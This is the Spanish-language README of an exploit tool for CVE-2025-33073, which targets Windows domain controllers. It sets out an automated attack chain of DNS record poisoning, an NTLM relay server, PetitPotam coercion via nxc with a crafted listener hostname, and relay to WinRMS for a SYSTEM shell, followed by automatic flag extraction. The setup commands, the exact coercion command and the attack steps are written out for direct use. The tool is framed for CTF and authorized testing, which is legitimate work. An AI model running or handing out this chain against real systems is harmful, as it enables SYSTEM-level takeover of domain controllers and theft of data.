
Herramienta de explotación universal para CVE-2025-33073 dirigida a controladores de dominio de Windows con privilegios de DNSAdmins y WinRM habilitado.

Herramienta de explotación universal para CVE-2025-33073 dirigida a controladores de dominio de Windows con privilegios DNSAdmins y WinRM habilitado.
CVE-2025-33073 es una vulnerabilidad crítica que permite a los atacantes lograr la ejecución de código a nivel SYSTEM en controladores de dominio de Windows mediante una combinación de:
Este PoC proporciona un framework de explotación universal y automatizado compatible con cualquier dominio, cualquier usuario y cualquier entorno CTF.
# Required tools
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python dependencies
pip3 install impacket netexec
# Clone krbrelayx
git clone https://github.com/dirkjanm/krbrelayx
# Clone this repository
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# Make exploit executable
chmod +x exploit.sh
# Verify tools installation
./exploit.sh # Will check all dependencies
./exploit.sh
El script solicitará:
Terminal 1 - Ejecuta el exploit:
./exploit.sh
# Follow the interactive prompts
# Wait for: "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!"
Terminal 2 - Ejecuta el comando de coerción (cópialo de la salida del Terminal 1):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
Resultado:
El script busca y extrae automáticamente:
*flag*.txt*root*.txt*user*.txtproof.txtUbicadas en: C:\Users\*\Desktop\
Todas las salidas se guardan en: /0pwn_exploit_<TIMESTAMP>/
relay.log - Salida del servidor de relay NTLMdns.log - Registros de operaciones DNSshell_output.log - Comandos de shell y flags extraídas1. DNS Poisoning (krbrelayx.dnstool)
└─> Modify/Create DNS record pointing to attacker IP
2. NTLM Relay Server (ntlmrelayx.py)
└─> Listen for incoming NTLM authentication
3. Coercion (nxc + PetitPotam)
└─> Force DC to authenticate to attacker IP
4. Relay → WinRMS
└─> Relay authentication to target WinRMS
5. SYSTEM Shell
└─> Execute commands as SYSTEM
6. Auto Flag Extraction
└─> Search and extract all flags
Edita la variable LONGHOST en exploit.sh:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
Modifica la función run_shell_commands() para buscar otros patrones de archivos:
# Add custom patterns here
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
Este PoC se proporciona para:
El acceso no autorizado a sistemas informáticos es ilegal.
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log para ver erroresnc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands()/0pwn_exploit_1234567890/
├── relay.log # NTLM relay server output
├── dns.log # DNS operation details
└── shell_output.log # Extracted flags & command output
# View relay events
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# Extract all flags
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# Check DNS operations
cat /0pwn_exploit_*/dns.log
[Demo y capturas de pantalla] - [Próximamente]

0pwn (uziii2208) - Concepto e investigación originales Mejorado con IA - Mejoras v1.0 y extracción automática de flags
Licencia MIT - Consulta el archivo LICENSE para más detalles
AVISO LEGAL:
Este software se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal y está penado por la ley.